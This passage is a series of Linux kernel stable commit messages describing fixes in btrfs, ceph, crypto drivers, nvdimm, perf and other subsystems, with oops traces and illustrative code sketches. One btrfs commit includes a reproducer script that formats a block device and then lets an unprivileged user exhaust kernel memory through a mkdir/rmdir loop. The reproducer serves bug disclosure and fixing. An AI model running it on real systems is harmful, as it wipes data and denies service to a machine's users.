at create_pending_snapshot() we call qgroup_account_snapshot(), which
switches the commit root for root 258 when it calls switch_commit_roots(),
so now the COWed version of leaf A, lets call it leaf A', is accessible
from the commit root of tree 258. At the end of qgroup_account_snapshot(),
we call record_root_in_trans() with 258 as its argument, which results
in btrfs_init_reloc_root() being called, which in turn calls
relocation.c:create_reloc_root() in order to create a relocation tree
associated to root 258, which results in assigning the value of 3403
(which is the current transaction id minus 1 = 3404 - 1) to the
last_snapshot field of root 258. When creating the relocation tree root
at ctree.c:btrfs_copy_root() we add a shared reference for leaf A',
corresponding to the relocation tree's root, when we call btrfs_inc_ref()
against the COWed root (a copy of the commit root from tree 258), which
is at level 1. So at this point leaf A' has 2 references, one normal
reference corresponding to root 258 and one shared reference corresponding
to the root of the relocation tree.
Transaction 3404 finishes its commit and transaction 3405 is started by
relocation when calling merge_reloc_root() for the relocation tree
associated to root 258. In the meanwhile leaf A' is COWed again, in
response to some filesystem operation, when we are still at transaction
3405. However when we COW leaf A', at ctree.c:update_ref_for_cow(), we
call btrfs_block_can_be_shared() in order to figure out if other trees
refer to the leaf and if any such trees exists, add a full back reference
to leaf A' - but btrfs_block_can_be_shared() incorrectly returns false
because the following condition is false:
btrfs_header_generation(buf) <= btrfs_root_last_snapshot(&root->root_item)
which evaluates to 3404 <= 3403. So after leaf A' is COWed, it stays with
only one reference, corresponding to the shared reference we created when
we called btrfs_copy_root() to create the relocation tree's root and
btrfs_inc_ref() ends up not being called for leaf A' nor we end up setting
the flag BTRFS_BLOCK_FLAG_FULL_BACKREF in leaf A'. This results in not
adding shared references for the extents from block group X that leaf A'
refers to with its file extent items.
Later, after merging the relocation root we do a call to
btrfs_drop_snapshot() in order to delete the relocation tree. This ends
up calling do_walk_down() when path->slots[1] points to leaf A', which
results in calling btrfs_lookup_extent_info() to get the number of
references for leaf A', which is 1 at this time (only the shared reference
exists) and this value is stored at wc->refs[0]. After this walk_up_proc()
is called when wc->level is 0 and path->nodes[0] corresponds to leaf A'.
Because the current level is 0 and wc->refs[0] is 1, it does call
btrfs_dec_ref() against leaf A', which results in removing the single
references that the extents from block group X have which are associated
to root 258 - the expectation was to have each of these extents with 2
references - one reference for root 258 and one shared reference related
to the root of the relocation tree, and so we would drop only the shared
reference (because leaf A' was supposed to have the flag
BTRFS_BLOCK_FLAG_FULL_BACKREF set).
This leaves the filesystem in an inconsistent state as we now have file
extent items in a subvolume tree that point to extents from block group X
without references in the extent tree. So later on when we try to decrement
the references for these extents, for example due to a file unlink operation,
truncate operation or overwriting ranges of a file, we fail because the
expected references do not exist in the extent tree.
This leads to warnings and transaction aborts like the following:
[ 588.965795] ------------[ cut here ]------------
[ 588.965815] WARNING: CPU: 2 PID: 2479 at fs/btrfs/extent-tree.c:1625 lookup_inline_extent_backref+0x432/0x5b0 [btrfs]
[ 588.965816] Modules linked in: af_packet iscsi_ibft iscsi_boot_sysfs xfs libcrc32c ppdev acpi_cpufreq button tpm_tis e1000 i2c_piix4 pcspkr parport_pc
parport tpm qemu_fw_cfg joydev btrfs xor raid6_pq sr_mod cdrom ata_generic virtio_scsi ata_piix virtio_pci bochs_drm virtio_ring drm_kms_helper syscopyarea
sysfillrect sysimgblt fb_sys_fops virtio ttm serio_raw drm floppy sg
[ 588.965831] CPU: 2 PID: 2479 Comm: kworker/u8:7 Not tainted 4.7.3-3-default-fdm+ #1
[ 588.965832] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
[ 588.965844] Workqueue: btrfs-extent-refs btrfs_extent_refs_helper [btrfs]
[ 588.965845] 0000000000000000 ffff8802263bfa28 ffffffff813af542 0000000000000000
[ 588.965847] 0000000000000000 ffff8802263bfa68 ffffffff81081e8b 0000065900000000
[ 588.965848] ffff8801db2af000 000000012bbe2000 0000000000000000 ffff880215703b48
[ 588.965849] Call Trace:
[ 588.965852] [<ffffffff813af542>] dump_stack+0x63/0x81
[ 588.965854] [<ffffffff81081e8b>] __warn+0xcb/0xf0
[ 588.965855] [<ffffffff81081f7d>] warn_slowpath_null+0x1d/0x20
[ 588.965863] [<ffffffffa0175042>] lookup_inline_extent_backref+0x432/0x5b0 [btrfs]
[ 588.965865] [<ffffffff81143220>] ? trace_clock_local+0x10/0x30
[ 588.965867] [<ffffffff8114c5df>] ? rb_reserve_next_event+0x6f/0x460
[ 588.965875] [<ffffffffa0175215>] insert_inline_extent_backref+0x55/0xd0 [btrfs]
[ 588.965882] [<ffffffffa017531f>] __btrfs_inc_extent_ref.isra.55+0x8f/0x240 [btrfs]
[ 588.965890] [<ffffffffa017acea>] __btrfs_run_delayed_refs+0x74a/0x1260 [btrfs]
[ 588.965892] [<ffffffff810cb046>] ? cpuacct_charge+0x86/0xa0
[ 588.965900] [<ffffffffa017e74f>] btrfs_run_delayed_refs+0x9f/0x2c0 [btrfs]
[ 588.965908] [<ffffffffa017ea04>] delayed_ref_async_start+0x94/0xb0 [btrfs]
[ 588.965918] [<ffffffffa01c799a>] btrfs_scrubparity_helper+0xca/0x350 [btrfs]
[ 588.965928] [<ffffffffa01c7c5e>] btrfs_extent_refs_helper+0xe/0x10 [btrfs]
[ 588.965930] [<ffffffff8109b323>] process_one_work+0x1f3/0x4e0
[ 588.965931] [<ffffffff8109b658>] worker_thread+0x48/0x4e0
[ 588.965932] [<ffffffff8109b610>] ? process_one_work+0x4e0/0x4e0
[ 588.965934] [<ffffffff810a1659>] kthread+0xc9/0xe0
[ 588.965936] [<ffffffff816f2f1f>] ret_from_fork+0x1f/0x40
[ 588.965937] [<ffffffff810a1590>] ? kthread_worker_fn+0x170/0x170
[ 588.965938] ---[ end trace 34e5232c933a1749 ]---
[ 588.966187] ------------[ cut here ]------------
[ 588.966196] WARNING: CPU: 2 PID: 2479 at fs/btrfs/extent-tree.c:2966 btrfs_run_delayed_refs+0x28c/0x2c0 [btrfs]
[ 588.966196] BTRFS: Transaction aborted (error -5)
[ 588.966197] Modules linked in: af_packet iscsi_ibft iscsi_boot_sysfs xfs libcrc32c ppdev acpi_cpufreq button tpm_tis e1000 i2c_piix4 pcspkr parport_pc
parport tpm qemu_fw_cfg joydev btrfs xor raid6_pq sr_mod cdrom ata_generic virtio_scsi ata_piix virtio_pci bochs_drm virtio_ring drm_kms_helper syscopyarea
sysfillrect sysimgblt fb_sys_fops virtio ttm serio_raw drm floppy sg
[ 588.966206] CPU: 2 PID: 2479 Comm: kworker/u8:7 Tainted: G W 4.7.3-3-default-fdm+ #1
[ 588.966207] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
[ 588.966217] Workqueue: btrfs-extent-refs btrfs_extent_refs_helper [btrfs]
[ 588.966217] 0000000000000000 ffff8802263bfc98 ffffffff813af542 ffff8802263bfce8
[ 588.966219] 0000000000000000 ffff8802263bfcd8 ffffffff81081e8b 00000b96345ee000
[ 588.966220] ffffffffa021ae1c ffff880215703b48 00000000000005fe ffff8802345ee000
[ 588.966221] Call Trace:
[ 588.966223] [<ffffffff813af542>] dump_stack+0x63/0x81
[ 588.966224] [<ffffffff81081e8b>] __warn+0xcb/0xf0
[ 588.966225] [<ffffffff81081eff>] warn_slowpath_fmt+0x4f/0x60
[ 588.966233] [<ffffffffa017e93c>] btrfs_run_delayed_refs+0x28c/0x2c0 [btrfs]
[ 588.966241] [<ffffffffa017ea04>] delayed_ref_async_start+0x94/0xb0 [btrfs]
[ 588.966250] [<ffffffffa01c799a>] btrfs_scrubparity_helper+0xca/0x350 [btrfs]
[ 588.966259] [<ffffffffa01c7c5e>] btrfs_extent_refs_helper+0xe/0x10 [btrfs]
[ 588.966260] [<ffffffff8109b323>] process_one_work+0x1f3/0x4e0
[ 588.966261] [<ffffffff8109b658>] worker_thread+0x48/0x4e0
[ 588.966263] [<ffffffff8109b610>] ? process_one_work+0x4e0/0x4e0
[ 588.966264] [<ffffffff810a1659>] kthread+0xc9/0xe0
[ 588.966265] [<ffffffff816f2f1f>] ret_from_fork+0x1f/0x40
[ 588.966267] [<ffffffff810a1590>] ? kthread_worker_fn+0x170/0x170
[ 588.966268] ---[ end trace 34e5232c933a174a ]---
[ 588.966269] BTRFS: error (device sda2) in btrfs_run_delayed_refs:2966: errno=-5 IO failure
[ 588.966270] BTRFS info (device sda2): forced readonly
This was happening often on openSUSE and SLE systems using btrfs as the
root filesystem (with its default layout where multiple subvolumes are
used) where balance happens in the background triggered by a cron job and
snapshots are automatically created before/after package installations,
upgrades and removals. The issue could be triggered simply by running the
following loop on the first system boot post installation:
while true; do
zypper -n in nfs-kernel-server
zypper -n rm nfs-kernel-server
done
(If we were fast enough and made that loop before the cron job triggered
a balance operation and the balance finished)
So fix by setting the last_snapshot field of the root to the value of the
generation of its commit root. Like this btrfs_block_can_be_shared()
behaves correctly for the case where the relocation root is created during
a transaction commit and for the case where it's created before a
transaction commit.
Fixes: 6426c7ad69 (btrfs: qgroup: Fix qgroup accounting when creating snapshot)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a7bf53f57 upstream.
If a log tree has a layout like the following:
leaf N:
...
item 240 key (282 DIR_LOG_ITEM 0) itemoff 8189 itemsize 8
dir log end 1275809046
leaf N + 1:
item 0 key (282 DIR_LOG_ITEM 3936149215) itemoff 16275 itemsize 8
dir log end 18446744073709551615
...
When we pass the value 1275809046 + 1 as the parameter start_ret to the
function tree-log.c:find_dir_range() (done by replay_dir_deletes()), we
end up with path->slots[0] having the value 239 (points to the last item
of leaf N, item 240). Because the dir log item in that position has an
offset value smaller than *start_ret (1275809046 + 1) we need to move on
to the next leaf, however the logic for that is wrong since it compares
the current slot to the number of items in the leaf, which is smaller
and therefore we don't lookup for the next leaf but instead we set the
slot to point to an item that does not exist, at slot 240, and we later
operate on that slot which has unexpected content or in the worst case
can result in an invalid memory access (accessing beyond the last page
of leaf N's extent buffer).
So fix the logic that checks when we need to lookup at the next leaf
by first incrementing the slot and only after to check if that slot
is beyond the last item of the current leaf.
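The corrected leaf-boundary handling in find_dir_range() looks roughly like
this (a sketch, not the literal diff):

  nritems = btrfs_header_nritems(path->nodes[0]);
  path->slots[0]++;                       /* advance first... */
  if (path->slots[0] >= nritems) {        /* ...then check if we left the leaf */
          ret = btrfs_next_leaf(root, path);
          if (ret)
                  goto out;
  }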
Signed-off-by: Robbie Ko <robbieko@synology.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Fixes: e02119d5a7 (Btrfs: Add a write ahead tree log to optimize synchronous operations)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
[Modified changelog for clarity and correctness]
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ef85b25e98 upstream.
This can only happen with CONFIG_BTRFS_FS_CHECK_INTEGRITY=y.
Commit 1ba98d0 ("Btrfs: detect corruption when non-root leaf has zero item")
assumes that a leaf is its root when leaf->bytenr == btrfs_root_bytenr(root).
However, we should not use btrfs_root_bytenr(root) since it is mainly
updated while committing the transaction. So the check can fail when doing
COW on this leaf while it is a root.
Change the check to use "if (leaf == btrfs_root_node(root))" instead, just
like how we check whether a leaf is a root in __btrfs_cow_block().
Fixes: 1ba98d086f (Btrfs: detect corruption when non-root leaf has zero item)
Reported-by: Jeff Mahoney <jeffm@suse.com>
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2939e1a86f upstream.
Problem statement: unprivileged user who has read-write access to more than
one btrfs subvolume may easily consume all kernel memory (eventually
triggering oom-killer).
Reproducer (./mkrmdir below essentially loops over mkdir/rmdir):
[root@kteam1 ~]# cat prep.sh
DEV=/dev/sdb
mkfs.btrfs -f $DEV
mount $DEV /mnt
for i in `seq 1 16`
do
mkdir /mnt/$i
btrfs subvolume create /mnt/SV_$i
ID=`btrfs subvolume list /mnt |grep "SV_$i$" |cut -d ' ' -f 2`
mount -t btrfs -o subvolid=$ID $DEV /mnt/$i
chmod a+rwx /mnt/$i
done
[root@kteam1 ~]# sh prep.sh
[maxim@kteam1 ~]$ for i in `seq 1 16`; do ./mkrmdir /mnt/$i 2000 2000 & done
[root@kteam1 ~]# for i in `seq 1 4`; do grep "kmalloc-128" /proc/slabinfo | grep -v dma; sleep 60; done
kmalloc-128 10144 10144 128 32 1 : tunables 0 0 0 : slabdata 317 317 0
kmalloc-128 9992352 9992352 128 32 1 : tunables 0 0 0 : slabdata 312261 312261 0
kmalloc-128 24226752 24226752 128 32 1 : tunables 0 0 0 : slabdata 757086 757086 0
kmalloc-128 42754240 42754240 128 32 1 : tunables 0 0 0 : slabdata 1336070 1336070 0
The huge numbers above come from insane number of async_work-s allocated
and queued by btrfs_wq_run_delayed_node.
The problem is caused by btrfs_wq_run_delayed_node() queuing more and more
works if the number of delayed items is above BTRFS_DELAYED_BACKGROUND. The
worker func (btrfs_async_run_delayed_root) processes at least
BTRFS_DELAYED_BATCH items (if they are present in the list). So, the machinery
works as expected while the list is almost empty. As soon as it gets
bigger, the worker func starts to process more than one item at a time,
which takes longer, and the chance of queuing more async_works than needed
gets higher.
The problem above is worsened by another flaw of delayed-inode implementation:
if async_work was queued in a throttling branch (number of items >=
BTRFS_DELAYED_WRITEBACK), corresponding worker func won't quit until
the number of items < BTRFS_DELAYED_BACKGROUND / 2. So, it is possible that
the func occupies CPU infinitely (up to 30sec in my experiments): while the
func is trying to drain the list, the user activity may add more and more
items to the list.
The patch fixes both problems in a straightforward way: refuse to queue too
many works in btrfs_wq_run_delayed_node() and bail out of the worker func
once at least BTRFS_DELAYED_WRITEBACK items have been processed.
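As a purely illustrative sketch of the worker-side guard (the loop shape
and the next_delayed_item()/process_item() helpers are placeholders, not
the real delayed-inode code):

  int processed = 0;

  /* bail out after a bounded amount of work so one worker cannot
   * occupy the CPU indefinitely while user activity refills the list */
  while ((item = next_delayed_item(delayed_root)) != NULL) {
          process_item(item);
          if (++processed >= BTRFS_DELAYED_WRITEBACK)
                  break;
  }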
Changed in v2: remove support of thresh == NO_THRESHOLD.
Signed-off-by: Maxim Patlasov <mpatlasov@virtuozzo.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0cbc72a178 upstream.
aoeblk contains some mysterious code that wants to elevate the bio
vec page counts while it's under IO. That is not needed, it's
fragile, and it's causing kernel oopses for some.
Reported-by: Don Koch <kochd@us.ibm.com>
Tested-by: Don Koch <kochd@us.ibm.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 777c6e0dae upstream.
Yu Zhao has noticed that __unregister_cpu_notifier only unregisters its
notifiers when HOTPLUG_CPU=y while the registration might succeed even
when HOTPLUG_CPU=n if MODULE is enabled. This means that e.g. zswap
might keep a stale notifier on the list on the manual clean up during
the pool tear down and thus corrupt the list, resulting in the following:
[ 144.964346] BUG: unable to handle kernel paging request at ffff880658a2be78
[ 144.971337] IP: [<ffffffffa290b00b>] raw_notifier_chain_register+0x1b/0x40
<snipped>
[ 145.122628] Call Trace:
[ 145.125086] [<ffffffffa28e5cf8>] __register_cpu_notifier+0x18/0x20
[ 145.131350] [<ffffffffa2a5dd73>] zswap_pool_create+0x273/0x400
[ 145.137268] [<ffffffffa2a5e0fc>] __zswap_param_set+0x1fc/0x300
[ 145.143188] [<ffffffffa2944c1d>] ? trace_hardirqs_on+0xd/0x10
[ 145.149018] [<ffffffffa2908798>] ? kernel_param_lock+0x28/0x30
[ 145.154940] [<ffffffffa2a3e8cf>] ? __might_fault+0x4f/0xa0
[ 145.160511] [<ffffffffa2a5e237>] zswap_compressor_param_set+0x17/0x20
[ 145.167035] [<ffffffffa2908d3c>] param_attr_store+0x5c/0xb0
[ 145.172694] [<ffffffffa290848d>] module_attr_store+0x1d/0x30
[ 145.178443] [<ffffffffa2b2b41f>] sysfs_kf_write+0x4f/0x70
[ 145.183925] [<ffffffffa2b2a5b9>] kernfs_fop_write+0x149/0x180
[ 145.189761] [<ffffffffa2a99248>] __vfs_write+0x18/0x40
[ 145.194982] [<ffffffffa2a9a412>] vfs_write+0xb2/0x1a0
[ 145.200122] [<ffffffffa2a9a732>] SyS_write+0x52/0xa0
[ 145.205177] [<ffffffffa2ff4d97>] entry_SYSCALL_64_fastpath+0x12/0x17
This can even be triggered manually by changing
/sys/module/zswap/parameters/compressor multiple times.
Fix this issue by making unregister APIs symmetric to the register so
there are no surprises.
Fixes: 47e627bc8c ("[PATCH] hotplug: Allow modules to use the cpu hotplug notifiers even if !CONFIG_HOTPLUG_CPU")
Reported-and-tested-by: Yu Zhao <yuzhao@google.com>
Signed-off-by: Michal Hocko <mhocko@suse.com>
Cc: linux-mm@kvack.org
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Dan Streetman <ddstreet@ieee.org>
Link: http://lkml.kernel.org/r/20161207135438.4310-1-mhocko@kernel.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2d0f48a13 upstream.
batadv_tt_prepare_tvlv_local_data can fail to allocate the memory for the
new TVLV block. The caller is informed about this problem with the returned
length of 0. Not checking this value results in an invalid memory access
when either tt_data or tt_change is accessed.
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 7ea7b4a142 ("batman-adv: make the TT CRC logic VLAN specific")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e251bb21a upstream.
The current ndelay() macro definition has an extra semi-colon at the
end of the line thus leading to a compilation error when ndelay is used
in a conditional block without curly braces like this one:
if (cond)
ndelay(t);
else
...
which, after the preprocessor pass gives:
if (cond)
m68k_ndelay(t);;
else
...
thus leading to the following gcc error:
error: 'else' without a previous 'if'
Remove this extra semi-colon.
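Schematically, the change amounts to (shown as a sketch of the macro, per
the m68k_ndelay() expansion quoted above):

  /* before: the trailing semicolon makes "ndelay(t);" expand to two
   * statements, breaking if/else without braces */
  #define ndelay(n) m68k_ndelay(n);

  /* after */
  #define ndelay(n) m68k_ndelay(n)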
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: c8ee038bd1 ("m68k: Implement ndelay() based on the existing udelay() logic")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3f4688a08 upstream.
This function sets req->r_locked_dir which is supposed to indicate to
ceph_fill_trace that the parent's i_rwsem is locked for write.
Unfortunately, there is no guarantee that the dir will be locked when
d_revalidate is called, so we really don't want ceph_fill_trace to do
any dcache manipulation from this context. Clear req->r_locked_dir since
it's clearly not safe to do that.
What we really want to know with d_revalidate is whether the dentry
still points to the same inode. ceph_fill_trace installs a pointer to
the inode in req->r_target_inode, so we can just compare that to
d_inode(dentry) to see if it's the same one after the lookup.
Also, since we aren't generally interested in the parent here, we can
switch to using a GETATTR to hint that to the MDS, which also means that
we only need to reserve one cap.
Finally, just remove the d_unhashed check. That's really outside the
purview of a filesystem's d_revalidate. If the thing became unhashed
while we're checking it, then that's up to the VFS to handle anyway.
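A rough sketch of the resulting check (error handling and request setup
trimmed; mdsc is the usual MDS client pointer):

  /* request created with CEPH_MDS_OP_GETATTR so the MDS knows the
   * parent is not needed and only one cap has to be reserved */
  err = ceph_mdsc_do_request(mdsc, NULL, req);
  if (err == 0 && d_inode(dentry) == req->r_target_inode)
          valid = 1;      /* dentry still points at the same inode */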
Fixes: 200fd27c8f ("ceph: use lookup request to revalidate dentry")
Link: http://tracker.ceph.com/issues/18041
Reported-by: Donatas Abraitis <donatas.abraitis@gmail.com>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Reviewed-by: "Yan, Zheng" <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4b707fa00a upstream.
The eLCDIF IP of the i.MX 7 SoC knows multiple clocks and lists them
separately:
Clock       Clock Root              Description
apb_clk     MAIN_AXI_CLK_ROOT       AXI clock
pix_clk     LCDIF_PIXEL_CLK_ROOT    Pixel clock
ipg_clk_s   MAIN_AXI_CLK_ROOT       Peripheral access clock
All of them are switched by a single gate, which is part of the
IMX7D_LCDIF_PIXEL_ROOT_CLK clock. Hence using that clock also for
the AXI bus clock (clock-name "axi") makes sure the gate gets
enabled when accessing registers.
There seems to be no separate AXI display clock, and the clock is
optional. Hence remove the dummy clock.
This fixes kernel freezes when starting the X-Server (which
disables/re-enables the display controller).
Fixes: e8ed73f691 ("ARM: dts: imx7d: add lcdif support")
Signed-off-by: Stefan Agner <stefan@agner.ch>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Olof Johansson <olof@lixom.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b67d0dd7d0 upstream.
Fix a bad memory access while disconnecting: netdev is freed before the
private data, and dev is accessed after netdev has been freed.
This causes a SLUB problem and raises a kernel oops with the SLUB debugger
config enabled.
Signed-off-by: Jiho Chu <jiho.chu@samsung.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9e5f7a149e upstream.
mv_cesa_hash_std_step() copies the creq->state into the SRAM at each
step, but this is only required on the first one. By doing that, we
overwrite the engine state, and get erroneous results when the crypto
request is split in several chunks to fit in the internal SRAM.
This commit changes the function to copy the state only on the first
step.
Fixes: commit 2786cee8e5 ("crypto: marvell - Move SRAM I/O op...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 48a992727d upstream.
Algorithms not compatible with mcryptd could be spawned by mcryptd
with a direct crypto_alloc_tfm invocation using a "mcryptd(alg)" name
construct. This causes mcryptd to crash the kernel if an arbitrary
"alg" is incompatible and not intended to be used with mcryptd. It is
an issue if AF_ALG tries to spawn mcryptd(alg) to expose it externally.
But such algorithms must be used internally and not be exposed.
Add a check at the time mcryptd spawns an algorithm to enforce that only
internal algorithms are allowed with mcryptd.
Link: http://marc.info/?l=linux-crypto-vger&m=148063683310477&w=2
Reported-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Tim Chen <tim.c.chen@linux.intel.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 39eaf75946 upstream.
Start with a clean slate before dealing with bit 16 (pointer size)
of Master Configuration Register.
This fixes the case of AArch64 boot loader + AArch32 kernel, when
the boot loader might set MCFGR[PS] and kernel would fail to clear it.
Reported-by: Alison Wang <alison.wang@nxp.com>
Signed-off-by: Horia Geantă <horia.geanta@nxp.com>
Reviewed-By: Alison Wang <Alison.wang@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d6eb270c57 upstream.
Given dimms and bus commands share the same command number space we need
to be careful that we are translating status in the correct context.
Otherwise we can, for example, fail an ND_CMD_GET_CONFIG_SIZE command
because max_xfer is zero. It fails because that condition erroneously
correlates with the 'cleared == 0' failure of ND_CMD_CLEAR_ERROR.
Fixes: aef2533822 ("libnvdimm, nfit: centralize command status translation")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82aa37cf09 upstream.
If an ARS Status command returns truncated output, do not process
partial records or otherwise consume non-status fields.
Fixes: 0caeef63e6 ("libnvdimm: Add a poison list and export badblocks")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit efda1b5d87 upstream.
Given ambiguities in the ACPI 6.1 definition of the "Output (Size)"
field of the ARS (Address Range Scrub) Status command, a firmware
implementation may in practice return 0, 4, or 8 to indicate that there
is no output payload to process.
The specification states "Size of Output Buffer in bytes, including this
field.". However, 'Output Buffer' is also the name of the entire
payload, and earlier in the specification it states "Max Query ARS
Status Output Buffer Size: Maximum size of buffer (including the Status
and Extended Status fields)".
Without this fix, if the BIOS happens to return 0 it causes memory
corruption, as evidenced by this result from the acpi_nfit_ctl() unit
test:
ars_status00000000: 00020000 00000000 ........
BUG: stack guard page was hit at ffffc90001750000 (stack is ffffc9000174c000..ffffc9000174ffff)
kernel stack overflow (page fault): 0000 [#1] SMP DEBUG_PAGEALLOC
task: ffff8803332d2ec0 task.stack: ffffc9000174c000
RIP: 0010:[<ffffffff814cfe72>] [<ffffffff814cfe72>] __memcpy+0x12/0x20
RSP: 0018:ffffc9000174f9a8 EFLAGS: 00010246
RAX: ffffc9000174fab8 RBX: 0000000000000000 RCX: 000000001fffff56
RDX: 0000000000000000 RSI: ffff8803231f5a08 RDI: ffffc90001750000
RBP: ffffc9000174fa88 R08: ffffc9000174fab0 R09: ffff8803231f54b8
R10: 0000000000000008 R11: 0000000000000001 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000003 R15: ffff8803231f54a0
FS: 00007f3a611af640(0000) GS:ffff88033ed00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffc90001750000 CR3: 0000000325b20000 CR4: 00000000000406e0
Stack:
ffffffffa00bc60d 0000000000000008 ffffc90000000001 ffffc9000174faac
0000000000000292 ffffffffa00c24e4 ffffffffa00c2914 0000000000000000
0000000000000000 ffffffff00000003 ffff880331ae8ad0 0000000800000246
Call Trace:
[<ffffffffa00bc60d>] ? acpi_nfit_ctl+0x49d/0x750 [nfit]
[<ffffffffa01f4fe0>] nfit_test_probe+0x670/0xb1b [nfit_test]
Fixes: 747ffe11b4 ("libnvdimm, tools/testing/nvdimm: fix 'ars_status' output buffer sizing")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a901f5495 upstream.
ACPI DSMs can have an 'extended' status which can be non-zero to convey
additional information about the command. In the xlat_status routine,
where we translate the command statuses, we were returning an error for
a non-zero extended status, even if the primary status indicated success.
Return from each command's 'case' once we have verified both its status
and extended status are good.
Fixes: 11294d63ac ("nfit: fail DSMs that return non-zero status by default")
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7f612a7f0b upstream.
Lukasz reported that perf stat counters overflow handling is broken on KNL/SLM.
Both these parts have full_width_write set, and that does indeed have
a problem. In order to deal with counter wrap, we must sample the
counter at at least half the counter period (see also the sampling
theorem) such that we can unambiguously reconstruct the count.
However commit:
069e0c3c40 ("perf/x86/intel: Support full width counting")
sets the sampling interval to the full period, not half.
Fixing that exposes another issue, in that we must not sign extend the
delta value when we shift it right; the counter cannot have
decremented after all.
With both these issues fixed, counter overflow functions correctly
again.
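Conceptually the two constraints look like this (illustrative only; the
names loosely follow the x86 PMU update path, this is not the verbatim
patch):

  /* 1) sample at no more than half the counter width, so a wrap can be
   *    reconstructed unambiguously */
  max_period = counter_mask >> 1;

  /* 2) keep the reconstructed delta unsigned so the right shift is a
   *    logical shift and does not sign-extend */
  u64 delta = (new_raw_count << shift) - (prev_raw_count << shift);
  delta >>= shift;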
Reported-by: Lukasz Odzioba <lukasz.odzioba@intel.com>
Tested-by: Liang, Kan <kan.liang@intel.com>
Tested-by: Odzioba, Lukasz <lukasz.odzioba@intel.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Vince Weaver <vincent.weaver@maine.edu>
Fixes: 069e0c3c40 ("perf/x86/intel: Support full width counting")
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4587631c7 upstream.
local_addr.svm_cid is host cid. We should check guest cid instead,
which is remote_addr.svm_cid. Otherwise we end up resetting all
connections to all guests.
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Peng Tao <bergwolf@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83929cce95 upstream.
Michael Kerrisk reported:
> Regarding the previous paragraph... My tests indicate
> that writing *any* value to the autogroup [nice priority level]
> file causes the task group to get a lower priority.
Because autogroup didn't call the then meaningless scale_load()...
Autogroup nice level adjustment has been broken ever since load
resolution was increased for 64-bit kernels. Use scale_load() to
scale group weight.
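A rough sketch of the adjusted weight setting (sched_prio_to_weight[] and
sched_group_set_shares() are the existing scheduler helpers; locking and
error handling omitted, and the exact call site may differ):

  /* map the nice level (-20..19) to a weight, then scale it to match
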